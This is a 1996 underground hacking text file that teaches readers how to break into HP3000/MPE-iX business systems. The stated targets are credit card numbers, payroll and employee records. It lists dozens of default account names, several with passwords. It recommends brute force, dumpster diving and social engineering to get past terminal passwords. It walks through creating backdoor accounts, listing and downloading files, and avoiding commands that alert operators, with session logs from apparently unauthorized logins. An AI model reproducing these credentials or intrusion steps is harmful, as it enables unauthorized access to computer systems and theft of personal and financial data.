STATION ID - 7047/3.12
9x Datakit Network
FOR OFFICIAL USE ONLY
This is a 9x system, restricted to authorized persons and for
official 9x business only. Anyone using this system, network or data
is subject to being monitored at any time for system administration and
for identifying unauthorized users or system misuse. Anyone using this
system expressly consents to such monitoring and is advised that any
evidence of criminal activity revealed through such monitoring may be
provided to law enforcement for prosecution.
Author : OneThought
Subject: Hacking the HP3000/MPE Platform
There have been several write ups written in the past about the
MPE operating system and how to hack it. To me many of these are
out of date with the times or havent gone into certin aspects of
the MPE-iX OS. To start this off i am going to shatter the myth
right now that the MPE is a out of date operating system and is
"not worth hacking" a phrase i have heard more then once now a
days. The HP3000/MPE OS is still ideal for a small work place of
10-15 terminals, several of these servers networked together creates
a powerful accounting and work system , Infact the MPE OSes latest
version was released in 1995 (MPE-iX 5.0) and is already being picked
up by several companies. Right now you are asking yourself "Why should
i hack a HP3000?". Besides being a fun system to navigate around, in
many cases HP3000s have some very good information inside of them.
Credit Card #s, Employees personal information, Payroll files are
all kept on HP3000s.
#Finding a HP3000.#
When it comes down to finding a HP3000 your options are limited.
Your best luck will definetly be scanning business exchanges, However
you may also find a few inside the network information system of some
unix boxes on the net. You will know when you have found one by the
MPE XL: Prompt on older MPEs,MPE/iX, or MPE/V. If you are unsure of
one being a HP3000 simply type some random letters at the prompt and
press enter. If it is truely a HP3000 you will get the message
"EXPECTED HELLO COMMAND".
#Getting inside.#
If you are attempting to hack a unsecured HP3000 then factory
defauts will suffice most of the time. The following is a list
of default accounts and some password protected accounts.
ADVMAIL.HPOFFICE
MGR.HPDESK
MGR.ROBLLE
MGR.VESOFT
MGR.WORD
MGR.INTX3
MGR.CAROLIAN
MGR.XLSERVER
MGR.CONV
MGR.HPP187
MGR.HPP189
MGR.HPP189
MGR.HPP196
MGR.HPOFFICE
MGR.CCC
MGR.RJE
MGR.SYS Acct password: LOTUS
MGR.ITF3000
MGR.SECURITY
MGR.HPWORD
MGR.TELESUP Acct password: HPONLY User Password: MGR
MGR.COGNOS
MGR.HPONLY
MGR.NETBASE
MGR.CNAS
MGR.REGO
MAIL.NETBASE
MAIL.MAIL
MAIL.TELESUP
MAIL.HPOFFICE
MAILMAN.HPOFFICE
OPERATOR.SUPPORT
OPERATOR.SYS
OPERATOR.COGNOS
OPERATOR.SYSTEM
OPERATOR.DISC
FIELD.HP
FIELD.HPUNSUP
FIELD.HPWORD
FIELD.SERVICE Acct password: HPWORD
FIELD.SUPPORT,PUB
FIELD.HPP187
MANAGER.SYS
MANAGER.COGNOS
MANAGER.HPOFFICE
MANAGER.ITF3000
MANAGER.SECURITY
MANAGER.TCH
SYS.TELESP
WP.HPOFFICE
SPOOLMAN.HPOFFICE
RSBCMON.SYS
PCUSER.SYS
Use the following default accounts listed above to login as
souch.
:HELLO MGR.SYS,PUB
Login Command: HELLO
Username : MGR
Account name : SYS
Group Name : PUB
When trying account and user names sometimes you will get the
message "ACCOUNT EXISTS, USERNAME DOES NOT". This means that you
have enterd a valid account but not a valid user name. The same
goes for "ACCOUNT/USERNAME EXIST BUT NOT IN HOME GROUP". Here
you must include a valid group name with the login account name
and user name.
*Note The group name is not required to be typed at the login prompt
most of the time.
#Barriers that will stand in the way of gaining access to a HP3000.#
Terminal password. Sometimes you will log in on a default account
and then recieve the prompt
TERMINAL PASSWORD:
The terminal password is a eight bit alpha password that is not
a normal feature of HP3000s, But some system administrators request
it being on a new system. The only way to get by this is a brute
force attack, or going out and doing some field work i.e trashing
at the companys location,social engineering, etc etc.
Another problem you may run across is a terminal that will not
accept logins from certin accounts. When running into this you will
need to find another account that can login on that terminal.
Case in point:
CONNECT 9600/ARQ/V32/LAPM/V42BIS
MPE XL:HELLO OPERATOR.SYS
HP3000 RELEASE: B.40.00 USER VERSION: B.40.00
FRI, JUN 28, 1996, 6:11 PM
MPE/iX HP31900 B.30.45 Copyright Hewlett-Packard 1987.
All Rights Reserved.
YOU ARE AT A TERMINAL THAT
YOU ARE NOT ALLOWED TO USE
SO NOW I LOG YOU OFF.
END OF PROGRAM
CPU=1. CONNECT=1. FRI, JUN 28, 1996, 6:11 PM.
NO CARRIER
Something else you may run into is closed sessions. This means that
at that time the system cannot create a new session for a number of
reasons, Maximum of users are already signed on or logins are not allowed
at that time. The best thing to do when running into that is to try again
every few hours till you are allowed to start a new session.
Case in point:
CONNECT 9600/ARQ/V32/LAPM/V42BIS
MPE XL: HELLO MGR.RJE
CAN'T START A NEW SESSION (CIERR 970)
NO CARRIER
The last thing i will cover when it comes to barriers on HP3000s
is the VESOFT add on. I will not go into this in depth but just give
you a rough over view. First off to identify a system running VESOFT
you will have MPE/V: as your prompt. There will be no default accounts
on this system, if you get in by other means it will be extremly
restrictive and secure. Your best hope here is to give up.
The first thing that you will want to do once inside is find out what
access (if any) that you have. This is done by doing a LISTACCT.
Case in point:
:LISTACCT
********************
ACCOUNT: <What ever acct you are>
DISC SPACE: 0(SECTORS) PASSWORD: **
CPU TIME : 2(SECONDS) LOC ATTR: $00000000
CONNECT TIME: 2(MINUTES) SECURITY--READ : ANY
DISC LIMIT: UNLIMITED WRITE : ANY
CPU LIMIT : UNLIMITED APPEND : ANY
CONNECT LIMIT: UNLIMITED LOCK : ANY
MAX PRI : 150 EXECUTE : ANY
GRP UFID : $055E0002 $0AC53AD3 $0055A7BE $2C052855 $04A775F1
USER UFID: $00000000 $00000000 $00000000 $00000000 $00000000
CAP: AM,ND,SF,BA,IA
Most of this is self explanitory. The imprtant part to look at
is the CAP: section. Here is the capeability list needed to understand
what access you have.
Abrev. Capeability.
SM System Manager
AM Account Manager
AL Account Librarian
GL Group Librarian
DI Diagnostician
OP System Supervisor
NA Network Administrator
NM Node Manager
SF Permanent Files
ND Access to nonsharable I/O devices
UV Use Volumes
CV Create Volumes
CS Use Communications Subsystem
PS Programmatic Sessions
LG User Logging
PH Process Handling
DS Extra Data Segments
MR Multiple RINs
PM Privilaged mode
IA Interactive Access
BA Local Batch Access
Now compare the chart i have just included with what ever
account you have. This will dictate what privilaged commands
you may be able to execute as i will describe later in this file.
#Making yourself an account#
Making yourself an account requires SM or AM access. On some ocasions
you will not be able to make an account with AM access if the System
Manager has modified your account. You will be able to give your new
account equal access as the one you are on when making it.
Case in point:
:NEWUSER <User id> <Group Id> <Password>
The same can also be said for the following commands..
:NEWGROUP <Group ID> *Creates a new group, very noticeable
:PURGEUSER <User ID> *Delites a user
:PURGEGROUP <Group ID> *Delites a group.
#Time to look around.#
You now have hopefully created a new account and know what access
you have. Now it is time to check the system out. First you will need
to know how to use the help file, as HPs may differ from version
to version. Type HELP <item you need help with> and it will bring
up other words to look at or a section of the help file. Do NOT type
HELP as the entire MPE manuel will be scrolled on the screen, Taking
aproximetly 18 minutes to be fully scrolled.
To find out how big this system is and what devices are available
type..
:SHOWDEV
LDEV AVAIL OWNERSHIP VOLID DEN ASSOCIATION
1 DISC N/A
2 DISC N/A
3 DISC N/A
4 DISC N/A
5 AVAIL
6 SPOOLED SPOOLER OUT
7 AVAIL
8 AVAIL
9 AVAIL
10 A AVAIL
11 AVAIL
12 AVAIL
13 AVAIL
14 AVAIL
15 AVAIL
16 AVAIL
17 AVAIL
18 AVAIL
19 AVAIL
20 A UNAVAIL #S8886: 8 FILES
21 A AVAIL
33 SPOOLED SPOOLER OUT
40 SPOOLED SPOOLER OUT
103 J AVAIL
104 J AVAIL
105 J AVAIL
106 J AVAIL
107 J AVAIL
108 J AVAIL
109 J AVAIL
110 J AVAIL
111 J AVAIL
112 J AVAIL
113 J AVAIL
114 J AVAIL
115 J AVAIL
116 J UNAVAIL #S10041: 8 FILES
117 J AVAIL
This will give you a reference for downloading which i will cover
later.
#Navigating commands around groups and files#
LISTF @ Lists every file in your current group
Case in point:
:LISTF @
FILENAME
ABORTEST ACCTJOBS AIFKUF ALOCATEJ ANSTART ANSTAT
ANSTOP ANUTIL ASOCTBL ATCUT000 ATCUTIL AUTOHIST
BACKUP BDLABEL BDLT BDMO BDREPORT BDXM
BRW BRWACCSD BRWAPPD BRWC000 BRWCOMP BRWCONV
BRWD3000 BRWDL000 BRWDLIST BRWDUSER BRWEMPTY BRWEXEC
BRWEXECO BRWF000 BRWGEND BRWJ000 BRWL000 BRWLIST
BRWM000 BRWSD BRWSDEXT BRWSETUP BRWSTART BRWSTOA
BRWSTRM BRWXL BUILDINT BULDACCT CATALOG CATTUTIL
CCMSGCAT CDCAT CDMGR CDMGRSKT CDSERVER CDSRVSKT
CDSTARTJ CDSTOPJ CEUDCS CHRDEF01 CHRDEF02 CHRDEF03
CHRDEF04 CHRDEF06 CHRDEF51 CHRDEF56 CHRDEF61 CHRDEF66
CI CICAT CICATERR CKINST CLS1 CMSTORE
COB74XL COB74XLG COB74XLK COB85XL COB85XLG COB85XLK
COBCAT COBCNTL COBEDIT COBMAC COBOL COBOL85
COBOLII COBUDC COMMA
LISTF @.@ Lists all the files in every group on your account.
LISTF @.@.@ Lists ALL files in every group on the system
*If you are in a rush for time dont use the above command.
LISTF @.<Group ID>.<Acct ID>, -1 Lists a specific users files.
LISTF @.@.@,2 Lists all files on system with group and account name.
DSCOPY <fname>.<group id>.<acct id> to <fname>.<group id>.<acct id>
^ Copies files from one account to another.
PURGE <fname>.<group id>.<acct id> Delites a file.
RENAME <old file>.<group>.<Acct>,<New file>.<Group>.<acct>
^ Renames a file.
RUN <File name>.<Group ID>.<Acct ID> Runs a file.
EDITOR <Filename>
Case in point:
:EDITOR <Whatever file here>
HP32201A.09.00 EDIT/3000 FRI, JUL 5, 1996, 5:01 AM
(C) HEWLETT-PACKARD CO. 1993
/
/END
:
Just type "END" to leave the editor.
To download use :DOWNLOAD <device>,<file>
*Refer back to SHOWDEV to figure out which device to use on the system.
#Other useful and not so useful commands#
SHOWCATALOG = This command will show commands unique to that system.
Case in point:
:SHOWCATALOG
SYSUDC5.UDC.SYS
SPENTRY SYSTEM
EDIT SYSTEM
COBOLII SYSTEM
ED SYSTEM
KSAM SYSTEM
COBEDIT SYSTEM
SJ SYSTEM
FORMSPEC SYSTEM
ENTRY SYSTEM
SO SYSTEM
SM SYSTEM
FREE5 SYSTEM
SH SYSTEM
L SYSTEM
QUAD SYSTEM
MPEX SYSTEM
MPEXLOGON SYSTEM
QEDITOR SYSTEM
GOD SYSTEM
JOBMASTER SYSTEM
SJ SYSTEM
SJJ SYSTEM
SJS SYSTEM
QUIZ SYSTEM
QUIZR SYSTEM
CONVRPO SYSTEM
QUICK SYSTEM
COGHELP SYSTEM
PHINIT12 SYSTEM
PHSRVN SYSTEM
PHSRVS12 SYSTEM
PHSRVS SYSTEM
CVRPO12E SYSTEM
SETPOWERHOUSE SYSTEM
RESETPOWERHOUSE SYSTEM
PHRUNPROG SYSTEM
PHRUNINTERBASE SYSTEM
GBAK SYSTEM
GCSU SYSTEM
GDEF SYSTEM
GDSCSERVER SYSTEM
GDSRSERVER SYSTEM
GDSLOCKPRINT SYSTEM
GDSRELAY SYSTEM
GFIX SYSTEM
GLTJ SYSTEM
GPRE SYSTEM
GRST SYSTEM
GSEC SYSTEM
GSTAT SYSTEM
ISCINSTALL SYSTEM
QLI SYSTEM
SETINTERBASE SYSTEM
RESETINTERBASE SYSTEM
PLISTF SYSTEM
FINDDIR SYSTEM
FINDFILE SYSTEM
LISTDIR SYSTEM
DISCUSE SYSTEM
SH SYSTEM
HPMPETOHFS SYSTEM
HPLISTFCLEANUP SYSTEM
HPPARSEFEQ SYSTEM
REPORT = Lists CPU allocation, disk allocation, disk volume, and
connect time for your group.
Case in point:
:REPORT
ACCOUNT FILESPACE-SECTORS CPU-SECONDS CONNECT-MINUTES
/GROUP COUNT LIMIT COUNT LIMIT COUNT LIMIT
RJE 0 ** 2 ** 2 **
/PUB 0 ** 2 ** 2 **
SHOWJOB = Lists all users and their group information along
with their session number and the availability to accept messages in
the form of QUIET for not being able to accept messages.
Case in point:
:SHOWJOB
JOBNUM STATE IPRI JIN JLIST INTRODUCED JOB NAME
#J11627 EXEC 10S LP FRI 1:11A GLPOSTJ,MGR.HPFAS
#J11625 EXEC 10S LP FRI 1:11A ARPOSTJ,MGR.HPFAS
#S9651 EXEC 302 302 FRI 1:19A LDEV220,PRINT.SPI
#S9650 EXEC 221 221 FRI 1:18A LDEV221,FORM1.SPI
#J11626 EXEC 10S LP FRI 1:11A APPOSTJ,MGR.HPFAS
#S9725 EXEC 116 16 FRI 9:30P MGR.RJE
#S8886 EXEC 20 20 FRI 10:20A CONSOLE,OPERATOR.SYS
#J11628 EXEC 10S LP FRI 1:11A MAXSTART,MGR.HPFAS
#S9652 EXEC 117 117 FRI 1:45A SPIM1.SPI
#S9656 EXEC 213 213 FRI 6:59A MIS,MGR.HPFAS
#S9701 EXEC 202 202 FRI 12:53P PRINT1.SPI
#S9721 EXEC 214 214 FRI 4:56P MSPENCE.SPI
#S923 EXEC 211 211 FRI 7:39P SUPV.SPI
13 JOBS:
0 INTRO
0 WAIT; INCL 0 DEFERRED
13 EXEC; INCL 9 SESSIONS
0 SUSP
JOBFENCE= 7; JLIMIT= 8; SLIMIT= 30
CURRENT: 6/28/96 21:44
JOBNUM STATE IPRI JIN JLIST SCHEDULED-INTRO JOB NAME
#J11607 SCHED 8 10S LP 6/28/96 22:15 FOBACKUP,MGR.SPI
#J11602 SCHED 8 10S LP 6/28/96 23:27 PSI0560J,MGR.SPI
#J11603 SCHED 8 10S LP 6/28/96 23:30 CPMNT2AJ,MGR.SPI
#J11605 SCHED 8 10S LP 6/28/96 23:35 PSI0560J,MGR.SPI
#J11608 SCHED 8 10S LP 6/29/96 0:30 SPIOFF,MGR.SPI
#J11639 SCHED 8 10S LP 6/29/96 5:00 PSI0890,MGR.SPI
#J11642 SCHED 8 10S LP 6/29/96 7:00 SLHCHCKJ,MGR.SPI
#J11866 SCHED 8 10S LP 6/29/96 16:00 UOMCHCKJ,MGR.SPI
#J10694 SCHED 8 10S LP 6/29/96 17:00 CAPCHCKJ,MGR.SPI
#J11885 SCHED 8 10S LP 6/29/96 18:00 NEWPRCEJ,MGR.SPI
#J11886 SCHED 8 10S LP 6/29/96 19:30 ORDERSJ,MGR.SPI
#J11636 SCHED 1 10S LP 6/30/96 4:00 VENDLIST,MGR.HPFAS
#J11892 SCHED 1 10S LP 6/30/96 4:00 VENDLIST,MGR.HPFAS
#J10720 SCHED 8 10S LP 7/ 1/96 0:00 WEEKINV,MGR.SPI
#J6568 SCHED 8 10S LP 7/ 1/96 6:30 DOWNTBJ,MGR.SPI
#J11884 SCHED 1 10S LP 7/ 1/96 17:15 BPOSTAR,MGR.HPFAS
#J11889 SCHED 1 10S LP 7/ 1/96 20:00 BPOSTAP,MGR.HPFAS
#J11890 SCHED 1 10S LP 7/ 1/96 20:10 BPOSTGL,MGR.HPFAS
#J11891 SCHED 1 10S LP 7/ 5/96 20:15 AUDITRPJ,MGR.HPFAS
19 SCHEDULED JOB(S)
Commands that you wont want to use..
SHOWTIME Shows the current time.
TELLOP <message> Messages Operator.
SETMSG ON/OFF Sets your availability to recieve messages.
TELL <Job>,<User>.<acct>; Message Sends a message to someone signed on.
#Logging off#
To log off just type BYE or EXIT at the prompt. You will then recieve
this logoff message..
:BYE
CPU=43. Connect=33. SAT, JUN 29, 1996, 1:03 AM.
NO CARRIER
#Conclusion#
I hope this file will spawn possible intrest once again in HP3000s
and the MPE Platform. HP will continue to support the MPE platform
for a very long time and with the extensive business software and
porting of unix to MPE systems you should expect to see these systems
for a few more decades. Greets to Black IC for his VESOFT write up
and to The Underground Consortium for their Hewlet Packard support.
